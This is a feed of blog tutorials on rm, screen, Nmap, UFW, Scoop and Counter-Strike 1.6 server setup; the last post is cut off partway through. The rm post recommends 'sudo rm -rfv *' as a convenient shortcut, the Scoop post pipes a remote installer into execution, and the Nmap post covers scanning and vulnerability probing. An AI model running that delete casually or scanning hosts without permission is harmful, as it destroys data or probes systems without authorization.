The `rm` command, which stands for `remove`, is a powerful tool that allows you to delete files and directories from your system.

### Removing Files with rm

The basic syntax for removing files using the `rm` command is straightforward:

```shell
rm filename
```

By entering this command, you delete the specified file called `filename` from your system.

### Safeguarding with Interactive Mode

To add an extra layer of caution, you can use the `-i` option for interactive mode:

```shell
rm -i filename
```

This prompts you to confirm the deletion of each file, preventing accidental removals. You can answer with `y&quot;`(yes) or `n` (no) for each file.

### Removing Directories with rm

Deleting directories requires a slightly different approach. To remove an empty directory, use the following command:

```shell
rmdir directory_name
```

However, if you need to remove a directory and its contents recursively, you can use the `-r` option:

```shell
rm -r directory_name
```

Take care when using the `-r` option, as it will delete the directory and all its contents without confirmation.

### Using rm with Caution: the -f Flag

The `-f` flag, which stands for `force` is a potent option that removes files and directories without any prompts or warnings. While this can be useful for batch operations, exercise caution, as you can easily delete important data unintentionally.

```shell
rm -f filename
```

### Deleting Files Verbosely

For a more detailed view of what&apos;s happening, use the `-v` flag to enable verbose output:

```shell
rm -v filename
```

This option displays each file&apos;s name as it&apos;s being removed.

## Advanced Usage

### Using Wildcards to Remove Multiple Files

Wildcards offer a powerful way to remove multiple files at once. For instance, you can use `*` to delete all files (excluding hidden files) within a directory:

```shell
rm -f *
```

### Convenient Shortcut

For users seeking a quick and comprehensive way to delete all files with verbosity, consider using the following command:

```shell
sudo rm -rfv *
```

## Conclusion and Best Practices

While the `rm` command is a powerful tool for file and directory removal, its capabilities come with risks. To make the most of it while minimizing the potential for data loss:

1. Always double-check the files and directories you&apos;re about to delete.
2. Use the interactive mode (`-i`) or verbose mode (`-v`) for extra caution and clarity.
3. Reserve the `-f` (force) option for situations where you&apos;re certain of the files you&apos;re deleting.
4. When removing directories, be mindful of using the `-r` option, as it can lead to the loss of important data.

By mastering the `rm` command and its various options, you can confidently manage your files and directories in Linux while minimizing the risk of unintended consequences.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Screen Command for Server Management</title><link>https://ummit.dev//posts/linux/tools/screen/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/screen/</guid><description>Discover the power of the screen command in Linux for effective server management, remote sessions, and persistent terminal sessions. Learn how to install, use, and maximize your productivity with this versatile tool.</description><pubDate>Thu, 16 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the realm of Linux server management, the `screen` command stands as a versatile and powerful tool that can significantly enhance your productivity and streamline your workflow. Whether you&apos;re a system administrator, a developer, or actively involved in server maintenance, the `screen` command offers an array of features that can optimize multitasking, empower remote interactions, and provide a robust environment for long-running processes.

## The Utility of the `screen` Command

At its core, the `screen` command is a terminal multiplexer—a tool that enables you to create, manage, and navigate between multiple terminal sessions within a single window. This is particularly valuable when working with servers, as it allows you to maintain control over multiple tasks and sessions simultaneously, all while keeping your terminal organized and efficient.

## Installation

Before you can harness the power of the `screen` command for your server management tasks, you may need to install it, depending on your Linux distribution:

### For Ubuntu/Debian:

```shell
sudo apt update
sudo apt install screen
```

### For CentOS/RHEL:

```shell
sudo yum install screen
```

### For Arch-based distributions (e.g., Arch Linux, Manjaro):

```shell
sudo pacman -S screen
```

## Getting Started with `screen`

Once `screen` is installed, its usage can greatly enhance your server management capabilities. Here are some fundamental concepts and commands to help you get started:

### Efficient Multitasking:

Initiating a new `screen` session allows you to juggle multiple tasks seamlessly. Use:

```shell
screen
```

### Detach and Reattach:

One of the most powerful features of `screen` is its ability to detach from a session and reattach later. To detach, press `Ctrl-a` followed by `d`. To reattach:

```shell
screen -r
```

### Multiple Windows:

Within a `screen` session, create multiple windows to manage different tasks. To create a new window, press `Ctrl-a` followed by `c`. Navigate between windows with `Ctrl-a` followed by `n` or `Ctrl-a` followed by `p`.

### Terminal Splitting:

Split your terminal screen into panes for efficient multitasking. Use `Ctrl-a` followed by `|` (vertical split) or `Ctrl-a` followed by `S` (horizontal split). Navigate between panes with `Ctrl-a` followed by `Tab`.

### Renaming Sessions:

Easily identify and manage your `screen` sessions by giving them meaningful names. For example, to create a new session named &quot;myserver,&quot; use:

```shell
screen -dmS myserver
```

## Advanced Features for Server Management

The `screen` command offers a variety of advanced features that are invaluable for server management:

### Collaborative Sessions:

Collaborate with others by sharing your `screen` session:

```shell
screen -x
```

### Session Logging:

Record your terminal session for future reference:

```shell
screen -L
```

## Elevating Your Server Management with `screen`

The `screen` command is an indispensable tool that can significantly enhance your server management capabilities. Whether you&apos;re overseeing remote servers, handling long-running processes, or conducting maintenance tasks, `screen` empowers you to maintain efficient and organized terminal sessions. Incorporating the `screen` command into your toolkit ensures that you have a powerful solution at your disposal for effective server management, allowing you to optimize your workflow and accomplish tasks with ease.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Simple Guide to Using Nmap for Network Scanning</title><link>https://ummit.dev//posts/infosec/nmap/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/nmap/</guid><description>In this comprehensive guide, we will explore how to harness the capabilities of Nmap to check your Network Security.</description><pubDate>Tue, 14 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction

Nmap is a powerful tool for scanning networks. It helps you find open ports, services, and potential security issues in your home network or server. This guide will show you how to use Nmap to check your network security.

## Installing Nmap

To use Nmap, you need to install it. It works on Windows, macOS, and Linux. If you&apos;re using Kali Linux, Nmap is already installed. For other Linux systems, you can install it with:

```bash
sudo apt update -y
sudo apt install nmap -y
```

### Scan a single IP

To scan a device on your network, use the following command:

```bash
nmap 192.168.1.1
```

&gt;*This command scans the specified IP address (192.168.1.1) to identify open ports and services running on that device.*

### Scan Multiple IPs

You can scan multiple devices on your network by specifying a range of IP addresses. For example:

```bash
nmap 192.168.1.1-20
```

&gt;*This command scans a range of IP addresses from 192.168.1.1 to 192.168.1.20, allowing you to check multiple devices in one go.*

### Service Version Detection

To detect the versions of services running on open ports, use:

```bash
nmap -sV &lt;target&gt;
```

&gt;*This command uses the `-sV` option to detect the versions of services running on the open ports of the specified target.*

### Scan a Larger Network

You might want to scan a larger network to identify all devices and services. As an useful example of how to known the Range of IP addresses in a network, you can refer to the CIDR notation table :)

| **CIDR Notation** | **IP Address Range**          |
|-------------------|-------------------------------|
| **/24**           | 192.168.0.0 - 192.168.0.255   |
| **/16**           | 192.168.0.0 - 192.168.255.255 |
| **/8**            | 192.0.0.0 - 192.255.255.255   |
| **/0**            | 0.0.0.0 - 255.255.255.255     |

And you can use the following command to scan a larger network:

```bash
nmap 192.168.0.0/24
```

&gt;*This command scans all IP addresses in the specified subnet (192.168.0.0/24), which includes 256 addresses from 192.168.0.1 to 192.168.0.255.*

### Service Detection

To detect services running on open ports, use:

```bash
nmap -Pn -sV &lt;target&gt;
```

&gt;*This command performs a scan on the target without pinging it first (using `-Pn`), while also detecting service versions.*

### Scan Without Ping

```bash
nmap -Pn &lt;target&gt;
```

&gt;*This command scans the target directly without checking if it is online, which can be useful for devices that do not respond to ping requests.*

### Ping Scan (Check Online Hosts)

```bash
nmap -sP &lt;target&gt;
```

&gt;*This command performs a ping scan to identify which hosts are online in the specified range or target.*

### List Scan (Show Hosts Without Scanning)

```bash
nmap -sL &lt;target&gt;
```

&gt;*This command lists all the targets without actually scanning them, which can be useful for generating a list of hosts for further analysis.*

### OS Detection

Nmap also provides OS detection capabilities. To detect the operating system of a target, use `-O` option. Operating system detection involves sending low-level networking packets and certain ICMP requests, which require root or administrator permissions. Also known as TCP/IP fingerprinting for OS scanning.

```bash
nmap -O &lt;target&gt;
```

&gt;*This command attempts to identify the operating system of the target by analyzing the responses to various network packets.*

### TCP SYN Scan with OS Detection

To perform a TCP SYN scan (stealth scan) and attempt to guess the target&apos;s operating system, use the `-sS -O` flags:

```bash
sudo nmap -sS -O &lt;target&gt;
```

*This command runs a TCP SYN scan (which is less detectable) and attempts to identify the operating system of the target.*

### TCP Connect Scan

To perform a TCP connect scan, use the `-sT` flag:

```bash
nmap -sT &lt;target&gt;
```

&gt;*This command performs a full TCP connect scan on the target, which establishes a full connection to each port to check if it is open.*

### Scanning for Specific Ports

To scan for specific ports, use the `-p` flag followed by the port numbers. For example, to scan ports 80, 443, and 8080, use:

```bash
nmap -p 80,443,8080 &lt;target&gt;
```

&gt;*This command scans the specified ports (80, 443, and 8080) on the target to check for open services.*

### Scanning range of Ports

To scan a range of ports, use the `-p` flag followed by the range of ports. For example, to scan ports 1 to 100, use:

```bash
nmap -p 1-100 &lt;target&gt;
```

&gt;*This command scans the range of ports from 1 to 100 on the target to check for open services.*

### Scanning All Ports

To scan all ports (1-65535), use the `-p-` flag:

```bash
nmap -p- &lt;target&gt;
```

&gt;*This command scans all ports on the target to check for open services.*

### Combo Options

You can combine multiple options to perform a more comprehensive scan. For example, to perform a SYN scan with version detection and OS detection and scan all ports, use:

```bash
sudo nmap -sS -sV -O &lt;target&gt;
```

## Vulnerability Scanning with Nmap

Nmap can also check for known vulnerabilities using scripts like `nmap-vulners`. The source code can be found at [vulnersCom/nmap-vulners](https://github.com/vulnersCom/nmap-vulners).

### Ensure `nmap-vulners` is Installed

To check if `nmap-vulners` is installed, run the following command, if you see a result like `vulners.nse`, it means that the `nmap-vulners` script is installed and available for use with your Nmap installation:

```bash
ls /usr/share/nmap/scripts | grep vulners
```

If you don&apos;t see any results, it&apos;s likely that the script isn&apos;t installed. You can download the script from the repository and place `*.nse` on `/usr/share/nmap/scripts/`.

### Scanning with `nmap-vulners`

Run the following command to check for vulnerabilities:

```bash
nmap --script vulners &lt;target&gt;
```

&gt;*This command runs Nmap and applies the `nmap-vulners` script to your scan, checking for known vulnerabilities.*

### Specity CVSS Score

You can specify the minimum CVSS score for vulnerabilities to be reported. For example, to only show vulnerabilities with a CVSS score of 7 or higher, use:

```bash
nmap --script vulners --script-args mincvss=7 &lt;target&gt;
```

&gt;*This command runs Nmap with the `nmap-vulners` script and only reports vulnerabilities with a CVSS score of 7 or higher.*

## Conclusion

Nmap is a versatile tool that can help you identify potential security issues in your network. By scanning your network with Nmap, you can find open ports, services, and vulnerabilities that may be exploited by attackers :)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>UFW Guide</title><link>https://ummit.dev//posts/linux/tools/ufw/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ufw/</guid><description>Discover Uncomplicated Firewall (UFW), a user-friendly tool for managing firewall rules in Linux. Learn how to secure your system, control incoming and outgoing traffic, and navigate UFW&apos;s features.</description><pubDate>Tue, 14 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Introduction to Uncomplicated Firewall (UFW)

In today&apos;s digital landscape, network security is of paramount importance. Safeguarding your Linux system from unauthorized access and potential threats is a critical step in maintaining its integrity. This is where Uncomplicated Firewall (UFW) comes into play – a user-friendly interface designed to manage iptables, the default firewall management tool for Linux. UFW simplifies the process of configuring and managing firewall rules, making it accessible to users of all skill levels. In this comprehensive guide, we will delve into the intricacies of UFW, empowering you to bolster your system&apos;s security.

## What is UFW?

Uncomplicated Firewall (UFW) serves as an essential front-end for iptables, offering a straightforward and intuitive means to handle firewall rules. It caters to both newcomers and seasoned professionals, abstracting the complexities of iptables while retaining its powerful functionalities. With UFW, you can define rules to regulate inbound and outbound network traffic, significantly enhancing the security of your system.

## Installation and Initial Steps

While UFW is often pre-installed on many Linux distributions, you can install it using your package manager if necessary. For instance:

### Ubuntu/Debian based:

To install UFW on Ubuntu/Debian based systems, use the following command:
```shell
sudo apt-get install ufw
```

### Arch-Based:

To install UFW on Arch-Based systems, use the following command:
```shell
sudo pacman -S ufw
```

### Fedora:

To install UFW on Fedora, use the following command:
```shell
sudo dnf install ufw
```

These commands will ensure that UFW is installed and ready for configuration on your system.

### Getting Started

Once installed, you can quickly enable UFW and begin using it. Here are the fundamental commands to kick-start your journey:

To enable UFW:
```shell
sudo ufw enable
```

To disable UFW:
```shell
sudo ufw disable
```

To check UFW status:
```shell
sudo ufw status
```

## Essential Firewall Management

### Allowing and Denying Connections

UFW adheres to a default deny-all policy, meaning it blocks all incoming connections until explicitly allowed. You can use the following commands to permit specific connections:

To allow incoming HTTP traffic:
```shell
sudo ufw allow 80/tcp
```

To allow incoming SSH traffic:
```shell
sudo ufw allow ssh
```

### Deleting, Resetting, Denying, and Allowing Rules

To effectively manage firewall rules, UFW provides key commands:

To delete a rule by its number:
```shell
sudo ufw delete &lt;rule_number&gt;
```

To reset UFW to its default settings:
```shell
sudo ufw reset
```

To deny incoming connections to a specific port:
```shell
sudo ufw deny &lt;port&gt;
```

To allow incoming connections to a specific port:
```shell
sudo ufw allow &lt;port&gt;
```

To delete a specific &quot;allow&quot; rule:

```shell
sudo ufw delete allow http
```

## Advanced Configuration and Customization

### Application Profiles

UFW includes application profiles to simplify rule configuration for common services. To enable a profile, use:

```shell
sudo ufw allow &lt;application_name&gt;
```

### Connection Rate Limiting

UFW empowers you to limit the number of connections to a particular port:

```shell
sudo ufw limit &lt;port&gt;/&lt;protocol&gt;
```

## Optimal Security Practices

Uncomplicated Firewall (UFW) revolutionizes the management of firewall rules, making network security accessible to a wider audience. However, ensuring effective protection requires adopting best practices:

1. Activate UFW to initiate security measures.
2. Define rules based on your system&apos;s requirements and services.
3. Regularly review and update your firewall rules.
4. Thoroughly test rules to confirm their intended functionality.

By mastering both UFW&apos;s foundational and advanced features, you can fortify your Linux system against potential threats and unauthorized access. UFW&apos;s user-friendly approach empowers individuals at all skill levels to take command of their system&apos;s network security and ensure its safety.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Scoop: Windows Terminal Package Manager</title><link>https://ummit.dev//posts/windows/terminal/scoop/</link><guid isPermaLink="true">https://ummit.dev//posts/windows/terminal/scoop/</guid><description>Enhance Your Terminal Efficiency with Scoop – Discover How to Install and Utilize this Windows Package Manager!</description><pubDate>Fri, 10 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Why Scoop?

Are you tired of the hassle of managing software installations on your Windows system? If you&apos;re looking for an efficient and command-line-based package manager, you&apos;re in for a treat! Enter Scoop, a versatile package manager that can simplify your software management tasks. In this guide, we&apos;ll walk you through the process of installing Scoop and How to using this package manager.

Before we dive into the details, if you&apos;re curious and eager to get started right away, you can find the official Scoop website at [here](https://scoop.sh/).

## What is Scoop?

Scoop is a nifty package manager designed exclusively for Windows systems. It allows you to install, update, and uninstall software packages from the command line, all without the need for clicking through wizards or prompts. With Scoop, software management becomes a breeze, and you can focus on what matters most: getting things done.

### Getting Started: Installing Scoop

To get started with Scoop, follow these simple steps:

1. **Open a PowerShell terminal:** Launch your PowerShell terminal.

2. **Set Execution Policy (Optional):** If this is your first time running a remote script, you might need to set the execution policy to allow it. Use the following command:

   ```powershell
   Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
   ```

3. **Install Scoop:** Now, it&apos;s time to install Scoop. Run the following command:

   ```powershell
   irm get.scoop.sh | iex
   ```

   This command retrieves the installation script from the internet and runs it using the `iex` (Invoke-Expression) command.

And that&apos;s it! You now have Scoop installed and ready to use!

### Basic Usage: Package Manage

With Scoop Package manage, you can start exploring its capabilities:

- **Installing Packages:** Use the `scoop install` command followed by the name of the package to install software effortlessly. For example:

  ```powershell
  scoop install git
  ```

- **Updating Packages:** Keep your database up to date with the `scoop update` command:

  ```powershell
  scoop update
  ```

- **Updating All Packages:** While the `scoop update --all` command is a convenient way to update all packages installed via Scoop,

    &gt;Notes: there might be instances where this command doesn&apos;t work as expected. In such cases, you may need to manually update specific packages using their individual update commands. This ensures that you&apos;re getting the most accurate and up-to-date updates for each package.

  ```powershell
  scoop update --all
  ```

  Keep in mind that, occasionally, the nature of certain packages or dependencies might require a manual update approach to ensure everything works smoothly.

- **Listing Installed Packages:** To see a list of all installed packages, you can use the `scoop list` command:

  ```powershell
  scoop list
  ```

  If you&apos;re unsure about the exact name of a package, you can use this command to quickly identify installed packages.

- **Updating Specific Packages:** If you want to ensure the update of a specific package, you can use the `scoop update` command followed by the package name. For instance, to update Git:

  ```powershell
  scoop update git
  ```

  If you&apos;re not sure about the package name, you can refer to the list of installed packages using `scoop list`.

Remember, staying up to date with package updates helps ensure your system is secure and that you&apos;re benefiting from the latest features and improvements.

## Installing and Managing Packages with Scoop: Global vs. User Installations

If you&apos;re familiar with Linux, you&apos;ve probably encountered the convenience of `sudo` for executing commands with superuser permissions. In the Windows world, there&apos;s a similar concept where you can install packages either globally (accessible by all users on the system) or locally (for your user account) using Scoop, a powerful package manager. This distinction is determined using the `-g` flag in the `scoop install` command.

### Local Installation: Tailored for Your User Account

A local installation is a great choice if you prefer to manage packages separately for each user on your system. By omitting the `-g` flag during installation, you&apos;re essentially telling Scoop to install the package locally, making it specific to your user account. The advantage of this approach is that you can keep your set of tools and utilities separate from those of other users. The best part? You won&apos;t need superuser permissions for installation.

Here&apos;s the command for a local installation:

```shell
scoop install &lt;package&gt;
```

Replace `&lt;package&gt;` with the name of the package you want to install.

### Global Installation: Available System-Wide

On the other hand, if you want a package to be accessible to all users on the system, a global installation is the way to go. This involves using the `-g` flag during installation. By doing so, you&apos;re instructing Scoop to install the package globally, making it available from any user account. **However, it&apos;s important to note that installing a package globally using the `-g` flag requires superuser permissions.** This is because global installation involves making system-wide changes that affect all users.

&gt;**Tip**: If you only need a package to be available for your user account, you can install it locally without using the `-g` flag. This ensures that you won&apos;t require superuser permissions for installation, and the package will remain exclusive to your user.

Here&apos;s the command for a global installation:

1. **Open the Terminal as Superuser**: Begin by opening the terminal with superuser privileges. This step is crucial as you&apos;ll need superuser access to install packages globally.

2. **Install package with Globally -g**: Replace `&lt;package&gt;` with the name of the package you intend to install.

```shell
scoop install -g &lt;package&gt;
```

By understanding the difference between local and global installations and the role of the `-g` flag, you can tailor your package management approach to suit your needs. With this knowledge, you can make the most of Scoop and efficiently organize your Windows terminal sessions.

## Simplify Superuser Tasks with Scoop and gsudo

Have you ever found yourself frustrated by the need to repeatedly right-click to open the Windows Terminal with superuser permissions? If so, there&apos;s a solution that can save you time and hassle: the `gsudo` package. This tool, which is available through Scoop, allows you to perform tasks that require administrative access without the need for right-clicking. Here&apos;s how to get started with `gsudo` using the global installation approach.

### Install gsudo Globally

To make the most of `gsudo`, I recommend a global installation. This way, the tool will be available system-wide, ensuring that you can use it from any user account. Let&apos;s go through the steps:

1. **Open the Terminal as Superuser**: Begin by opening the terminal with superuser privileges. This step is crucial as you&apos;ll need superuser access to install packages globally.

2. **Install gsudo**: Use the following command to install `gsudo` globally:

   ```shell
   scoop install -g gsudo
   ```

   By using the `-g` flag, you&apos;re installing `gsudo` in a way that&apos;s accessible to all users on the system.

3. **Restart Your Terminal**: After the installation is complete, restart your terminal to ensure that the changes take effect.

4. **Enjoy Effortless Superuser Access**: That&apos;s it! With `gsudo` installed, you can now use the `sudo` command in your terminal. When you do, a popup window will appear, requesting superuser permissions. This means you can perform administrative tasks without the need to right-click and open a new terminal window each time.

By opting for the global installation of `gsudo`, you&apos;re streamlining your workflow and eliminating the need for repetitive actions. Whether you&apos;re managing files, configuring settings, or performing other administrative tasks, `gsudo` simplifies the process and enhances your overall terminal experience.

#### Putting gsudo to the Test

Now that you have `gsudo` installed, it&apos;s time to put it to the test! If you&apos;re not familiar with Linux commands, don&apos;t worry—I&apos;ll guide you through the process. With `gsudo`, you can perform tasks that require superuser permissions without having to right-click and open the application as an administrator.

Here&apos;s a practical example of how to use `gsudo` to open Notepad with superuser privileges:

1. **Open the Terminal**: Launch the terminal to get started.

2. **Use `gsudo`**: With `gsudo`, you can use either the `sudo` or `gsudo` command. They both work the same way. To open Notepad with superuser permissions, simply type:

   ```shell
   sudo notepad
   ```

   This command tells the terminal to run Notepad with superuser privileges, allowing you to edit system files and perform administrative tasks.

3. **Enter Your Password**: After executing the command, a popup window will appear, asking for your permission to run Notepad with superuser privileges. Enter your password to proceed.

4. **Start Editing**: Voila! Notepad is now open with the necessary permissions. You can use it to edit files that require administrative access.

By using `gsudo`, you&apos;ve eliminated the need for repetitive right-click actions to open applications with superuser privileges. This streamlined approach enhances your workflow and makes it easier to perform administrative tasks from the command line.

## Conclusion

Scoop is a fantastic tool that simplifies software management on Windows systems. By following the steps outlined in this guide, you&apos;ve successfully installed Scoop and unlocked a world of efficient package management. From installing software to keeping it updated, Scoop has your back, saving you time and effort.

So why not embrace the power of Scoop and take control of your software ecosystem? With Scoop&apos;s command-line convenience, you&apos;ll be amazed at how smoothly software management can be. Get ready to streamline your system and focus on what truly matters!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>The Ultimate Guide to Setting Up a Complete Counter-Strike 1.6 Server, From Zero to Zombie Plague Server, Play with yapb bot and Public the server on the Internet!</title><link>https://ummit.dev//posts/games/counter-strike/16/16-24hr-wan-server-full-tutorials/</link><guid isPermaLink="true">https://ummit.dev//posts/games/counter-strike/16/16-24hr-wan-server-full-tutorials/</guid><description>Learn how to set up a Counter Strike 1.6 server on an Ubuntu Virtual Private Server (VPS) with this comprehensive guide, Also learn how to install yapb bot.</description><pubDate>Fri, 10 Dec 2021 00:00:00 GMT</pubDate><content:encoded>## Why Choose a VPS for Hosting?

If you&apos;re considering hosting your own Counter-Strike 1.6 (CS 1.6) server and welcoming players to join your game world, opting for a Virtual Private Server (VPS) is a wise decision. A VPS offers various advantages, such as enhanced security and stability, making it an optimal choice for setting up your CS 1.6 server. This guide will provide you with step-by-step instructions on how to create and manage a CS 1.6 server on a Linux-based VPS running Ubuntu.

## Step 1: Renting a VPS Server

So, you&apos;ve decided to embark on the journey of setting up your own CS 1.6 server, complete with all the exciting mods and features. The first step on this exciting adventure is to secure a Virtual Private Server (VPS) that will become the foundation of your gaming paradise. In this part of the guide, we&apos;ll explore the process of renting a VPS server, ensuring you have the necessary resources to create an unforgettable CS 1.6 experience.

### Why Opt for a VPS Server?

Before we dive into the intricacies of VPS server rental, let&apos;s briefly touch on why a VPS is the preferred choice for hosting your CS 1.6 server. A VPS offers you a dedicated virtual environment, providing the resources and control necessary to create a seamless gaming experience. With the flexibility to choose your server&apos;s specifications and the ability to install custom software, a VPS is the perfect platform for your CS 1.6 ambitions.

### Exploring VPS Providers

To begin your journey, you&apos;ll need to choose a VPS provider that aligns with your preferences and requirements. There are several reputable options to consider, each offering different pricing plans, server locations, and features. Here are a few noteworthy providers to explore:

- **AWS Lightsail:** Amazon Web Services&apos; (AWS) Lightsail offers an intuitive platform for launching and managing VPS instances. With a variety of pre-configured images and easy scaling options, Lightsail is an excellent choice for beginners and experienced users alike.

- **DigitalOcean:** Known for its user-friendly interface and straightforward pricing, DigitalOcean provides a range of VPS solutions tailored to different needs. Whether you&apos;re a gaming enthusiast or a developer, DigitalOcean has options to suit your requirements.

- **Google Cloud:** Google Cloud&apos;s Compute Engine offers high-performance virtual machines that can handle the demands of a CS 1.6 server. With advanced networking features and a global network of data centers, Google Cloud provides a solid foundation for your gaming server.

- **Linode:** Linode is renowned for its reliability and competitive pricing. With a focus on simplicity and performance, Linode&apos;s VPS offerings are designed to meet the needs of various projects, including game servers.

## Step 2: Logging into Your VPS Server

With your VPS server in hand, it&apos;s time to roll up your sleeves and embark on the journey of creating your CS 1.6 gaming paradise. While we won&apos;t delve into the intricacies of VPS security (we&apos;re here to focus on the gaming action!), let&apos;s kick things off by getting you logged into your server.

### Preparing for Server Access

Before we dive into the thrilling world of CS 1.6 setup, you&apos;ll need a secure way to access your VPS. This is where SSH (Secure Shell) comes into play. SSH allows you to connect to your server over a secure channel, ensuring that your actions are encrypted and protected from prying eyes.

Your VPS provider will have detailed documentation on how to access your server using SSH. This documentation will include crucial information like the server&apos;s IP address, username, and hostname. Make sure to have this information at hand before proceeding.

### Logging In with SSH

Now that you&apos;re armed with the necessary information, let&apos;s get you logged into your server using SSH. Here&apos;s how it&apos;s done:

1. **Open a Terminal:** On your local machine, open a terminal. If you&apos;re using a Windows machine, you can use tools like PuTTY or Windows Subsystem for Linux (WSL) to access SSH.

2. **SSH Command:** In the terminal, use the SSH command along with the provided IP address, username, and hostname to initiate the connection. For example:

   ```shell
   ssh root@&lt;ip&gt; -v
   ```

   Replace `&lt;ip&gt;` with the actual IP address of your VPS server. The `-v` flag adds verbosity, giving you more information about the connection process.

3. **Verify Connection:** After entering the command, you&apos;ll be prompted to verify the authenticity of the server&apos;s fingerprint. This is a security measure to ensure you&apos;re connecting to the correct server. Type `yes` to continue.

4. **Enter Password:** If this is your first time connecting, you&apos;ll be prompted to enter the password associated with the specified username (usually `root`). Note that the password won&apos;t be visible as you type it.

5. **Welcome to Your VPS:** Congratulations! If all goes well, you should now be logged into your VPS server. You&apos;ll see a command prompt indicating that you&apos;re ready to start your CS 1.6 adventure.

And there you have it! You&apos;ve successfully logged into your VPS server using SSH, setting the stage for the exciting journey ahead. In the upcoming parts of this guide, we&apos;ll delve into the installation of essential tools and the step-by-step process of setting up your CS 1.6 server, complete with mods and features. Prepare to become the master of your CS 1.6 domain and let the gaming fun begin!

## Step 3: Updating, Upgrading, and Port 22 Access: Laying the Foundation

Now that you&apos;re logged into your VPS server, it&apos;s time to ensure that your system is up to date and that you have the necessary port access to maintain a seamless connection. In this segment, we&apos;ll be using the reliable Ubuntu distribution to guide us through the process. Ubuntu&apos;s stability and performance make it an excellent choice for hosting game servers.

### Up to date Your System

Before we get into the nitty-gritty of gaming, let&apos;s make sure your system is fresh and up to date. Run the following commands to update, upgrade, and perform a distribution upgrade on your system:

```shell
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt-get dist-upgrade -y
```

### Allowing Port 22 Access

Port 22 is the default port for SSH connections, allowing you to securely access your server. To ensure that you don&apos;t lock yourself out of your server on subsequent logins, you need to allow traffic on port 22.

Enter the following command to enable SSH access:

```shell
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
```

With this rule in place, you&apos;re granting permission for SSH traffic to enter through port 22, which means you can log in without any obstacles.

## Step 4: Allowing Server Ports with UFW

Imagine ports as the doorways to your server – they determine what type of traffic is allowed in and out. In this step, we&apos;re going to ensure that the necessary port for your CS 1.6 server is open and ready to receive players. Think of it as inviting gamers into your digital arena.

Previously, we used `iptables` to manage ports, but for simplicity&apos;s sake, we&apos;re introducing `ufw` (Uncomplicated Firewall), a user-friendly alternative. We&apos;re going to allow port 27015 this time, which is a common choice for CS 1.6 servers.

### Installing and Enabling UFW

First things first, let&apos;s install `ufw` and enable it to ensure it starts up automatically after system boot:

```shell
sudo apt-get install ufw -y
sudo ufw enable
```

### Allowing Port 27015

Now, let&apos;s grant access to port 27015, which is a common UDP port used by CS 1.6 servers:

```shell
sudo ufw allow 27015/udp
```

## Step 5: Installing SteamCMD

SteamCMD is for Generate game server files. It allows you to download and update game server files from Steam&apos;s content distribution system. In this step, we&apos;ll install SteamCMD, which is essential for setting up and maintaining your CS 1.6 server.

To get started, follow these instructions (assuming you&apos;re using Ubuntu):

1. **Adding the Multiverse Repository**:

   Multiverse is an Ubuntu repository that contains software packages that aren&apos;t officially supported by Canonical but are still maintained by the community. To add the Multiverse repository, run:

   ```shell
   sudo add-apt-repository multiverse
   ```

2. **Installing Required Packages**:

   Before installing SteamCMD, let&apos;s make sure your system is ready. Install the necessary packages using the following commands:

   ```shell
   sudo apt install software-properties-common -y
   sudo dpkg --add-architecture i386
   sudo apt update -y
   ```

3. **Installing SteamCMD**:

   With the prerequisites in place, you&apos;re ready to install SteamCMD:

   ```shell
   sudo apt install lib32gcc-s1 -y
   sudo apt install steamcmd -y
   ```

## Step 6: Installing Game Server Required Files

Your CS 1.6 server needs the necessary game files to function properly. In this step, we&apos;ll use SteamCMD to download and install these files.

1. **Open SteamCMD**:

   Launch SteamCMD by entering the following command in your terminal:

   ```shell
   steamcmd
   ```

2. **Login with anonymous**:

   Once SteamCMD is running, log in as an anonymous user with:

   ```shell
   login anonymous
   ```

3. **Install CS 1.6 Server Files**:

   Now that you&apos;re logged in, it&apos;s time to download and install the CS 1.6 server files. Enter the following commands:

   ```shell
   app_update 90 validate
   ```

   The number `90` corresponds to the CS 1.6 game ID. The `validate` parameter ensures that the files are validated and correctly installed.
   &gt;Notes: You might encounter an error the first time you try to run `app_update 90 validate`. Don&apos;t worry, this is a common issue with SteamCMD. Simply try the `app_update 90 validate` command again, and it should work fine.

4. **Exit SteamCMD**:

   Once the server files are downloaded and installed, you can exit SteamCMD by typing:

   ```shell
   exit
   ```

## Step 7: Testing the Server

Now, your CS 1.6 server is set up with the basic game files. However, before you can dive into the action, you need to start the server and ensure everything is running as expected. Let&apos;s put your server to the test!

1. **Navigate to the Server Directory**:

   The CS 1.6 server files are located in the following directory:

   ```shell
   ~/.steam/steamapps/common/Half-Life/
   ```

   Use the `cd` command to navigate to this directory:

   ```shell
   cd ~/.steam/steamapps/common/Half-Life/
   ```

2. **Start the Server**:

   With the server files directory as your current location, use the following command to start the CS 1.6 server:

   ```shell
   screen -dmS hlds ./hlds_run -game cstrike +map de_dust2 -port 27015 +maxplayers 32 -insecure
   ```

   Let&apos;s break down the components of this command:

   - `-dmS hlds`: This portion of the command sets up a detached screen session named `hlds` for the server process.
   - `./hlds_run`: This command starts the server program.
   - `-game cstrike`: Specifies that the game being run is Counter-Strike 1.6.
   - `+map de_dust2`: Specifies the initial map to load, in this case, `de_dust2.`
   - `-port 27015`: Sets the server&apos;s port to 27015.
   - `+maxplayers 32`: Limits the maximum number of players in a game to 32.
   - `-insecure`: Disables Valve Anti-Cheat (VAC) for now.

3. **Access Your Server**:

   Once the server is running, it&apos;s time to see the fruits of your labor. Launch Counter-Strike 1.6 on your client machine. In the game&apos;s console, press the tilde key (`~`) to open the console and enter the following command:

   ```shell
   connect &lt;your_server_ip&gt;:27015
   ```

   Replace `&lt;your_server_ip&gt;` with the actual IP address of your VPS.

   Alternatively, you can search for your server in the server list within the game and connect from there.

4. **detach and Managing the Server**:

